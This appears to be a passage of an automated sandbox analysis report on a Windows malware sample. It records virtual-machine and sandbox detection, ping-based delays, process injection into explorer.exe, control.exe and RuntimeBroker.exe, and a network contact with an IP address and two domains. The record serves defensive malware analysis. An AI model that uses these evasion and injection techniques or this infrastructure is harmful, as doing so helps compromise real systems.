                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RuntimeBroker.exe, 0000002D.00000000.502166854.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513265661.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495786789.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.526561852.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.490570180.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.507573940.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532262658.000001FFC2000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLL5
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6733Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2704Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0627FD47
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft
                      Source: explorer.exe, 0000001B.00000000.408453384.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                      Source: RuntimeBroker.exe, 00000031.00000000.538603337.0000018280A54000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 2E09.bin.27.drBinary or memory string: gencounter Microsoft Hyper-V Gene Kernel
                      Source: 2E09.bin.27.drBinary or memory string: vmgid Microsoft Hyper-V Gues Kernel
                      Source: 2E09.bin.27.drBinary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: 2E09.bin.27.drBinary or memory string: vpci Microsoft Hyper-V Virt Kernel
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: 2E09.bin.27.drBinary or memory string: storflt Microsoft Hyper-V Stor Kernel
                      Source: mshta.exe, 00000013.00000002.342969322.00000162CE011000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 2E09.bin1.48.dr, 2E09.bin.27.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002D.00000000.507758371.000001FFC2056000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
                      Source: explorer.exe, 0000001B.00000000.410736983.0000000005138000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_062765C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0628BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_062799BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_062786AD
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06278FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_06278FEC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: gamexperts.net
                      Source: C:\Windows\explorer.exeDomain query: cabrioxmdes.at
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2740000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 15723670000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 5D0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 360000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2760000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35E000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2740000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 15723670000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 418792000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 491CC81000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copyJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute readJump to behavior
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
